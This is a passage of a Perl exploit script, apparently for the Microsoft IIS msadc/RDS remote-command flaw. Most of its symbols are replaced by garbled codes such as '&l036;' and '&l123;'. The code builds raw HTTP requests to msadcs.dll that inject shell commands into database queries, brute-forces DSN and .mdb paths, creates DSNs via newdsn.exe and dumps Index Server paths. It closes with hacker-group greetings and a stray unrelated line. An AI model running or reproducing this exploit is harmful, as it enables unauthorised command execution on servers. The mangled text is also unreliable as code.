if (!defined &l036;args&l123;s} || &l036;args&l123;s}==3)&l123;
print "&l92;nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==4)&l123;
print "&l92;nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==5)&l123;
if (defined &l036;args&l123;u})&l123;
print "&l92;xStep 5: Trying UNC...";
&use_unc; } else &l123; "&l92;nNo -u; Step 5 skipped.&l92;n"; }}
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==6)&l123;
if (defined &l036;args&l123;e})&l123;
print "&l92;nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else &l123; "&l92;nNo -e; Step 6 skipped.&l92;n"; }}
print "&l92;n&l92;nNo luck, guess you&l039;ll have to use a real hack, eh?&l92;n";
exit;
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub sendraw &l123; l this saves the whole transaction anyway
my (&l036;pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&l039;tcp&l039
||0) ||die("Socket problems&l92;n");
if(connect(S,pack "SnA4x8",2,80,&l036;target))&l123;
open(OUT,">raw.out"); my @in;
select(S); &l036;|=1; print &l036;pstr;
while(<S>)&l123; print OUT &l036;_; push @in, &l036;_;
print STDOUT "." if(defined &l036;args&l123;X});}
close(OUT); select(STDOUT); close(S); return @in;
} else &l123; die("Can&l039;t connect...&l92;n"); }}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_header &l123; l make the HTTP request
my &l036;aa, &l036;bb;
if (defined &l036;args&l123;V})&l123;
&l036;aa="VbBusObj.VbBusObjCls.GetRecordset";
&l036;bb="2";
} else &l123;
&l036;aa="AdvancedDataFactory.Query";
&l036;bb="3";}
&l036;msadc=<<EOT
POST /msadc/msadcs.dll/&l036;aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: &l036;clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=&l036;bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: &l036;reqlen
EOT
;
&l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
return &l036;msadc;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_req &l123; l make the RDS request
my (&l036;switch, &l036;p1, &l036;p2)=@_;
my &l036;req=""; my &l036;t1, &l036;t2, &l036;query, &l036;dsn;
if (&l036;switch==1)&l123; l this is the btcustmr.mdb query
&l036;query="Select * from Customers where City=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=" .
&l036;p1 . ":&l92;&l92;" . &l036;p2 . "&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;";}
elsif (&l036;switch==2)&l123; l this is general make table query
&l036;query="create table AZZ (B int, C varchar(10))";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==3)&l123; l this is general exploit table query
&l036;query="select * from AZZ where C=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==4)&l123; l attempt to hork file info from index server
&l036;query="select path from scope()";
&l036;dsn="Provider=MSIDXS;";}
elsif (&l036;switch==5)&l123; l bad query
&l036;query="select";
&l036;dsn="&l036;p1";}
elsif (&l036;switch==6)&l123; l this is table-independant query (new)
&l036;query="select * from MSysModules where name=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}
&l036;t1= make_unicode(&l036;query);
&l036;t2= make_unicode(&l036;dsn);
if(defined &l036;args&l123;V}) &l123; &l036;req=""; } else &l123;&l036;req = "&l92;x02&l92;x00&l92;x03&l92;x00"; }
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t1));
&l036;req.= "&l92;x00&l92;x00" . &l036;t1 ;
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t2));
&l036;req.= "&l92;x00&l92;x00" . &l036;t2 ;
&l036;req.="&l92;r&l92;n--!ADM!ROX!YOUR!WORLD!--&l92;r&l92;n";
return &l036;req;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_unicode &l123; l quick little function to convert to unicode
my (&l036;in)=@_; my &l036;out;
for (&l036;c=0; &l036;c < length(&l036;in); &l036;c++) &l123; &l036;out.=substr(&l036;in,&l036;c,1) . "&l92;x00"; }
return &l036;out;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub rdo_success &l123; l checks for RDO return success (this is kludge)
my (@in) = @_; my &l036;base=content_start(@in);
if(&l036;in[&l036;base]=~/multipart&l92;/mixed/)&l123;
return 1 if( &l036;in[&l036;base+10]=~/^&l92;x09&l92;x00/ );}
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub make_dsn &l123; l this (tries to) make a DSN for us
print "&l92;nMaking DSN: ";
foreach &l036;drive (@drives) &l123;
print "&l036;drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft&l92;%2B" .
"Access&l92;%2BDriver&l92;%2B&l92;%28*.mdb&l92;%29&l92;&dsn=wicca&l92;&dbq="
. &l036;drive . "&l92;%3A&l92;%5Csys.mdb&l92;&newdb=CREATE_DB&l92;&attr= HTTP/1.0&l92;n&l92;n");
&l036;results[0]=~mlHTTP&l92;/([0-9&l92;.]+) ([0-9]+) ([^&l92;n]*)l;
return 0 if &l036;2 eq "404"; l not found/doesn&l039;t exist
if(&l036;2 eq "200") &l123;
foreach &l036;line (@results) &l123;
return 1 if &l036;line=~/<H2>Datasource creation successful<&l92;/H2>/;}}
} return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub verify_exists &l123;
my (&l036;page)=@_;
my @results=sendraw("GET &l036;page HTTP/1.0&l92;n&l92;n");
return &l036;results[0];}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub try_btcustmr &l123;
foreach &l036;dir (@sysdirs) &l123;
print "&l036;dir -> "; l fun status so you can see progress
foreach &l036;drive (@drives) &l123;
print "&l036;drive: "; l ditto
&l036;reqlen=length( make_req(1,&l036;drive,&l036;dir) ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(1,&l036;drive,&l036;dir));
if (rdo_success(@results))&l123;print "Success!&l92;n";
save("dbq=".&l036;drive.":&l92;&l92;".&l036;dir."&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;");
exit;}
else &l123; verbose(odbc_error(@results)); funky(@results);}} print "&l92;n";}}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub odbc_error &l123;
my (@in)=@_; my &l036;base;
my &l036;base = content_start(@in);
if(&l036;in[&l036;base]=~/application&l92;/x-varg/)&l123; l it *SHOULD* be this
&l036;in[&l036;base+4]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92
]//g; &l036;in[&l036;base+5]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92
]//g; &l036;in[&l036;base+6]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92
]//g; return &l036;in[&l036;base+4].&l036;in[&l036;base+5].&l036;in[&l036;base+6];}
print "&l92;nNON-STANDARD error. Please sent this info to rfp&l92;@wiretrip.net:&l92;n";
print "&l036;in : " . &l036;in[&l036;base] . &l036;in[&l036;base+1] . &l036;in[&l036;base+2] . &l036;in[&l036;base+3] .
&l036;in[&l036;base+4] . &l036;in[&l036;base+5] . &l036;in[&l036;base+6]; exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub verbose &l123;
my (&l036;in)=@_;
return if !&l036;verbose;
print STDOUT "&l92;n&l036;in&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub save &l123;
my (&l036;p1)=@_; my &l036;ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...&l92;n";
if (defined &l036;args&l123;c})&l123; &l036;ropt="c ";}
if (defined &l036;args&l123;V})&l123; &l036;ropt.="V ";}
if (defined &l036;args&l123;w})&l123; &l036;ropt.="w ";}
print OUT "v2&l92;n&l036;ip&l92;n&l036;ropt&l92;n&l036;p1&l92;n";
close OUT;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub load &l123;
my (&l036;action)=@_;
my @p; my &l036;drvst="driver=&l123;Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn&l039;t open rds.save&l92;n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if &l036;p[0] ne "v2&l92;n";
&l036;ip="&l036;p[1]"; &l036;ip=~s/&l92;n//g;
&l036;target= inet_aton(&l036;ip) || die("inet_aton problems");
print "Resuming to &l036;ip ...";
@switches=split(/ /,&l036;p[2]);
foreach &l036;switch (@switches) &l123;
&l036;args&l123;&l036;switch}="1";}
if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;
&l036;torun="&l036;p[3]"; &l036;torun=~s/&l92;n//g;
if(&l036;torun=~/btcustmr/)&l123;
&l036;args&l123;&l039;c&l039;}="1";} l this is a kludge to make it work
if(&l036;torun=~/^dbq/)&l123; &l036;torun=&l036;drvst.&l036;torun; }
if(run_query("&l036;torun"))&l123;
print "Success!&l92;n";} else &l123; print "failed&l92;n"; }
exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub create_table &l123;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
my (&l036;in)=@_;
&l036;reqlen=length( make_req(2,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(2,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 1 if &l036;temp=~/Table &l039;AZZ&l039; already exists/;
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub known_dsn &l123;
foreach &l036;dSn (@dsns) &l123;
print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "&l036;dSn: Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}} print "&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub is_access &l123;
my (&l036;in)=@_;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
&l036;reqlen=length( make_req(5,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(5,&l036;in,""));
my &l036;temp= odbc_error(@results);
verbose(&l036;temp); return 1 if (&l036;temp=~/Microsoft Access/);
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub run_query &l123;
my (&l036;in)=@_; my &l036;req;
if (defined &l036;args&l123;c})&l123;&l036;req=3;} else &l123;&l036;req=6;}
&l036;reqlen=length( make_req(&l036;req,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(&l036;req,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 0;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub known_mdb &l123;
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my &l036;dir, &l036;drive, &l036;mdb;
my &l036;drv="driver=&l123;Microsoft Access Driver (*.mdb)}; dbq=";
foreach &l036;drive (@drives) &l123;
foreach &l036;dir (@sysdirs)&l123;
foreach &l036;mdb (@sysmdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":&l92;&l92;".&l036;dir.&l036;mdb))&l123;
if(run_query(&l036;drv . &l036;drive . ":&l92;&l92;" . &l036;dir . &l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive .":&l92;&l92;".&l036;dir.&l036;mdb); exit;
}}}}}
foreach &l036;drive (@drives) &l123;
foreach &l036;mdb (@mdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
if(run_query(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive.":".&l036;mdb); exit;
}}}}
}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub hork_idx &l123;
print "&l92;nAttempting to dump Index Server tables...&l92;n";
print " NOTE: Sometimes this takes a while, other times it stalls&l92;n&l92;n";
&l036;reqlen=length( make_req(4,"","") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results))&l123;
my &l036;max=@results; my &l036;c; my %d;
for(&l036;c=19; &l036;c<&l036;max; &l036;c++)&l123;
&l036;results[&l036;c]=~s/&l92;x00//g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._]&l123;1,40}/&l92;n/g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._&l92;n]//g;
&l036;results[&l036;c]=~/([a-zA-Z]&l92;:&l92;&l92
([a-zA-Z0-9 _~&l92;&l92;]+)&l92;&l92;/;&l036;d&l123;"&l036;1&l036;2"}="";}
foreach &l036;c (keys %d)&l123; print "&l036;c&l92;n"; }
} else &l123;print "Index server not installed/query failed&l92;n"; }}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub dsn_dict &l123;
open(IN, "<&l036;args&l123;e}") || die("Can&l039;t open external dictionary&l92;n");
while(<IN>)&l123;
&l036;hold=&l036;_; &l036;hold=~s/[&l92;r&l92;n]//g; &l036;dSn="&l036;hold"; print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}}
print "&l92;n"; close(IN);}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub content_start &l123; l this will take in the server headers
my (@in)=@_; my &l036;c;
for (&l036;c=1;&l036;c<500;&l036;c++) &l123; l assume there&l039;s less than 500 headers
if(&l036;in[&l036;c] =~/^&l92;x0d&l92;x0a/)&l123;
if (&l036;in[&l036;c+1]=~/^HTTP&l92;/1.[01] [12]00/) &l123; &l036;c++; }
else &l123; return &l036;c+1; }}}
return -1;} l it should never get here actually
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub funky &l123;
my (@in)=@_; my &l036;error=odbc_error(@in);
if(&l036;error=~/ADO could not find the specified provider/)&l123;
print "&l92;nServer returned an ADO miscofiguration message&l92;nAborting.&l92;n";
exit;}
if(&l036;error=~/A Handler is required/)&l123;
print "&l92;nServer has custom handler filters (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/specified Handler has denied Access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/server has denied access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub has_msadc &l123;
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0&l92;n&l92;n");
my &l036;base=content_start(@results);
return if(&l036;results[&l036;base]=~/Content-Type: application&l92;/x-varg/);
my @s=grep("Server: ",@results);
if(&l036;s[0]!~/IIS/)&l123; print "Doh! They&l039;re not running IIS.&l92;n&l036;s[0]&l92;n" }
else &l123; print "/msadc/msadcs.dll was not found.&l92;n";}
exit;}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub use_unc &l123;
&l036;uncpath=&l036;args&l123;u};
&l036;driverline="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=";
if(!&l036;uncpath=~/^&l92;&l92;&l92;&l92;[a-zA-Z0-9_.]+&l92;&l92;[-a-zA-Z0-9_]+&l92;&l92;.+/)&l123;
print "Your UNC path sucks. You need the following format:&l92;n".
"&l92;&l92;server(ip preferable)&l92;share&l92;some-file.mdb&l92;n&l92;n"; exit; }
if(create_table(&l036;driverline.&l036;uncpath))&l123;
if(run_query(&l036;driverline.&l036;uncpath))&l123;
print "Success!&l92;n"; save ("dbq=".&l036;uncpath); exit;}}
}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
sub get_name &l123; l this was added last minute
my &l036;msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; &l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
my @results=sendraw(&l036;msadc);
my &l036;base=content_start(@results);
&l036;results[&l036;base+6]=~s/[^-A-Za-z0-9!&l92;@&l92;l&l92;&l036;&l92;%^&l92;&*()&l92;[&l92;]_=+~<>.,?]//g;
print "Machine name: &l036;results[&l036;base+6]&l92;n";}
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
l special greets to trambottic, hex_edit, vacuum (technotronic), all l!adm,
l l!w00w00 & lrhino9 (that&l039;s a lot of people, and they are all very elite and
l good friends!), wiretrip, l0pht, nmrc & all of phrack
l
l thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
l
l I wish I could really name everyone, but I can&l039;t. Don&l039;t feel slighted if
l your not on the list...
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
ALINTININ ALINTISININ ALINTISIDIR
uah
